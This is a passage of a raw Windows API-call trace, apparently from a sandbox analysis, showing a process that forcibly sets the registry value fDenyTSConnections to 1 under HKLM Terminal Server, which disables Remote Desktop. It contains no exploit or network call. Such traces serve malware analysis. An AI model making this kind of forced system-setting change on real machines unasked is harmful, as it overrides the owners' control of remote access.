RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x4947a0 [0137.056] lstrlenW (lpString="") returned 0 [0137.056] GetProcessHeap () returned 0x490000 [0137.056] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x2) returned 0x4947c0 [0137.056] GetProcessHeap () returned 0x490000 [0137.056] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x494370 [0137.056] GetProcessHeap () returned 0x490000 [0137.056] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x4947e0 [0137.056] GetProcessHeap () returned 0x490000 [0137.056] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x4943a0 [0137.056] GetProcessHeap () returned 0x490000 [0137.056] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x4943d0 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x494400 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498560 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x494280 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x4985f0 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x4984d0 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498740 [0137.057] GetProcessHeap () returned 0x490000 [0137.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x4987d0 [0137.057] GetProcessHeap () returned 0x490000 [0137.058] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x4942a0 [0137.058] GetProcessHeap () returned 0x490000 [0137.058] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498500 [0137.058] GetProcessHeap () returned 0x490000 [0137.058] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498770 [0137.058] GetProcessHeap () returned 0x490000 [0137.058] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x4987a0 [0137.058] GetProcessHeap () returned 0x490000 [0137.058] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498470 [0137.058] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.418] GetProcessHeap () returned 0x490000 [0137.418] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x494310 [0137.418] _memicmp (_Buf1=0x494310, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0137.418] GetProcessHeap () returned 0x490000 [0137.418] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x1e) returned 0x498530 [0137.418] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 67 [0137.418] GetProcessHeap () returned 0x490000 [0137.418] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x493e90 [0137.418] _memicmp (_Buf1=0x493e90, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0137.418] GetProcessHeap () returned 0x490000 [0137.418] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x8e) returned 0x493eb0 [0137.418] _vsnwprintf (in: _Buffer=0x498530, _BufferCount=0xe, _Format="|%s|", _ArgList=0xcfcf8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0137.419] _vsnwprintf (in: _Buffer=0x493eb0, _BufferCount=0x46, _Format="|%s|", _ArgList=0xcfcf8 | out: _Buffer="|HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server|") returned 69 [0137.419] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0137.419] lstrlenW (lpString="|HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server|") returned 69 [0137.419] RtlRestoreLastWin32Error () returned 0x364000 [0137.419] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 67 [0137.419] GetProcessHeap () returned 0x490000 [0137.419] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x88) returned 0x493870 [0137.419] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 67 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0137.419] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.420] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0137.421] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0137.425] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0137.433] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.433] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0137.433] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 67 [0137.434] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0137.434] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 67 [0137.434] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 67 [0137.434] StrChrIW (lpStart="HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server", wMatch=0x5c) returned="\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" [0137.435] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0137.435] GetProcessHeap () returned 0x490000 [0137.435] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x28) returned 0x4986e0 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 1 [0137.435] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_LOCAL_MACHINE", cchCount2=-1) returned 2 [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] StrChrIW (lpStart="SYSTEM\\CurrentControlSet\\Control\\Terminal Server", wMatch=0x5c) returned="\\CurrentControlSet\\Control\\Terminal Server" [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] StrChrIW (lpStart="CurrentControlSet\\Control\\Terminal Server", wMatch=0x5c) returned="\\Control\\Terminal Server" [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] StrChrIW (lpStart="Control\\Terminal Server", wMatch=0x5c) returned="\\Terminal Server" [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] StrChrIW (lpStart="Terminal Server", wMatch=0x5c) returned 0x0 [0137.435] RtlRestoreLastWin32Error () returned 0x364000 [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] RtlRestoreLastWin32Error () returned 0x364000 [0137.435] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\Terminal Server") returned 48 [0137.435] GetProcessHeap () returned 0x490000 [0137.435] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x62) returned 0x494a40 [0137.436] GetProcessHeap () returned 0x490000 [0137.436] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x8e) returned 0x490720 [0137.436] GetProcessHeap () returned 0x490000 [0137.436] GetProcessHeap () returned 0x490000 [0137.436] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4986e0) returned 1 [0137.436] GetProcessHeap () returned 0x490000 [0137.436] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4986e0) returned 0x28 [0137.506] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4986e0) returned 1 [0137.879] GetProcessHeap () returned 0x490000 [0137.879] GetProcessHeap () returned 0x490000 [0137.879] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x493870) returned 1 [0137.879] GetProcessHeap () returned 0x490000 [0137.879] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x493870) returned 0x88 [0137.880] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x493870) returned 1 [0137.880] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0137.880] lstrlenW (lpString="fDenyTSConnections") returned 18 [0137.880] GetProcessHeap () returned 0x490000 [0137.892] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x26) returned 0x498590 [0137.892] lstrlenW (lpString="fDenyTSConnections") returned 18 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x79) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0137.892] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0137.893] StrDupW (lpSrch="REG_DWORD") returned="REG_DWORD" [0137.893] lstrlenW (lpString="REG_DWORD") returned 9 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0137.893] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_EXPAND_SZ", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_MULTI_SZ", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_BINARY", cchCount2=-1) returned 3 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_DWORD", cchCount2=-1) returned 2 [0137.893] LocalFree (hMem=0x494ab0) returned 0x0 [0137.893] RtlRestoreLastWin32Error () returned 0x364000 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0137.893] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0137.894] lstrlenW (lpString="1") returned 1 [0137.894] GetProcessHeap () returned 0x490000 [0137.894] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x4) returned 0x494ab0 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0137.894] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0137.902] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0137.902] RtlRestoreLastWin32Error () returned 0x364000 [0137.903] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\Terminal Server", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xcfdd0, lpdwDisposition=0xcfde8 | out: phkResult=0xcfdd0*=0x84, lpdwDisposition=0xcfde8*=0x2) returned 0x0 [0137.903] RegQueryValueExW (in: hKey=0x84, lpValueName="fDenyTSConnections", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0137.903] GetProcessHeap () returned 0x490000 [0137.903] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498620 [0137.903] GetProcessHeap () returned 0x490000 [0137.903] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x20) returned 0x498680 [0137.903] GetProcessHeap () returned 0x490000 [0137.903] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x18) returned 0x493f50 [0137.903] _memicmp (_Buf1=0x493f50, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0137.903] GetProcessHeap () returned 0x490000 [0137.903] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x200) returned 0x499650 [0137.904] LoadStringW (in: hInstance=0x0, uID=0xca, lpBuffer=0x499650, cchBufferMax=256 | out: lpBuffer="Value %s exists, overwrite(Yes/No)? ") returned 0x24 [0137.956] lstrlenW (lpString="Value %s exists, overwrite(Yes/No)? ") returned 36 [0137.956] GetProcessHeap () returned 0x490000 [0137.956] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x4a) returned 0x4938e0 [0137.956] _memicmp (_Buf1=0x493f50, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0137.956] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x499650, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0137.956] lstrlenW (lpString="YNA") returned 3 [0137.956] GetProcessHeap () returned 0x490000 [0137.956] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x8) returned 0x49a170 [0137.956] GetThreadLocale () returned 0x409 [0137.956] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="1", cchCount1=2, lpString2="0x", cchCount2=2) returned 3 [0137.957] _memicmp (_Buf1=0x494310, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0137.957] lstrlenW (lpString="1") returned 1 [0137.957] lstrlenW (lpString="1") returned 1 [0137.998] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0137.998] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0137.998] lstrlenW (lpString="1") returned 1 [0137.998] _errno () returned 0x5e0840 [0137.998] _errno () returned 0x5e0840 [0137.998] lstrlenW (lpString="") returned 0 [0137.998] _memicmp (_Buf1=0x494310, _Buf2=0x7ff69b2300d8, _Size=0x7) returned 0 [0137.998] lstrlenW (lpString="1") returned 1 [0137.998] lstrlenW (lpString="1") returned 1 [0137.998] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0137.998] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0137.998] lstrlenW (lpString="1") returned 1 [0137.998] _errno () returned 0x5e0840 [0137.998] _errno () returned 0x5e0840 [0137.998] lstrlenW (lpString="") returned 0 [0137.999] RegSetValueExW (in: hKey=0x84, lpValueName="fDenyTSConnections", Reserved=0x0, dwType=0x4, lpData=0xcfddc*=0x1, cbData=0x4 | out: lpData=0xcfddc*=0x1) returned 0x0 [0138.006] RegCloseKey (hKey=0x84) returned 0x0 [0138.006] GetProcessHeap () returned 0x490000 [0138.006] GetProcessHeap () returned 0x490000 [0138.006] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x494a40) returned 1 [0138.006] GetProcessHeap () returned 0x490000 [0138.006] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x494a40) returned 0x62 [0138.007] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x494a40) returned 1 [0138.007] GetProcessHeap () returned 0x490000 [0138.007] GetProcessHeap () returned 0x490000 [0138.007] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x490720) returned 1 [0138.007] GetProcessHeap () returned 0x490000 [0138.007] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x490720) returned 0x8e [0138.007] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x490720) returned 1 [0138.007] GetProcessHeap () returned 0x490000 [0138.007] GetProcessHeap () returned 0x490000 [0138.007] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x498590) returned 1 [0138.007] GetProcessHeap () returned 0x490000 [0138.007] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x498590) returned 0x26 [0138.009] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x498590) returned 1 [0138.009] GetProcessHeap () returned 0x490000 [0138.009] GetProcessHeap () returned 0x490000 [0138.009] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x494ab0) returned 1 [0138.009] GetProcessHeap () returned 0x490000 [0138.009] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x494ab0) returned 0x4 [0138.009] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x494ab0) returned 1 [0138.009] RtlRestoreLastWin32Error () returned 0x364000 [0138.009] GetLastError () returned 0x0 [0138.009] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xcfd50, nSize=0x0, Arguments=0x0 | out: lpBuffer="䩀I") returned 0x27 [0138.027] GetLastError () returned 0x0 [0138.028] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0138.028] GetProcessHeap () returned 0x490000 [0138.028] GetProcessHeap () returned 0x490000 [0138.028] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4947c0) returned 1 [0138.028] GetProcessHeap () returned 0x490000 [0138.029] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4947c0) returned 0x2 [0138.029] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4947c0) returned 1 [0138.029] GetProcessHeap () returned 0x490000 [0138.029] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x50) returned 0x490720 [0138.029] RtlRestoreLastWin32Error () returned 0x364000 [0138.029] LocalFree (hMem=0x494a40) returned 0x0 [0138.029] __iob_func () returned 0x7ff87fe6e210 [0138.029] _fileno (_File=0x7ff87fe6e240) returned 1 [0138.029] _errno () returned 0x5e0840 [0138.029] 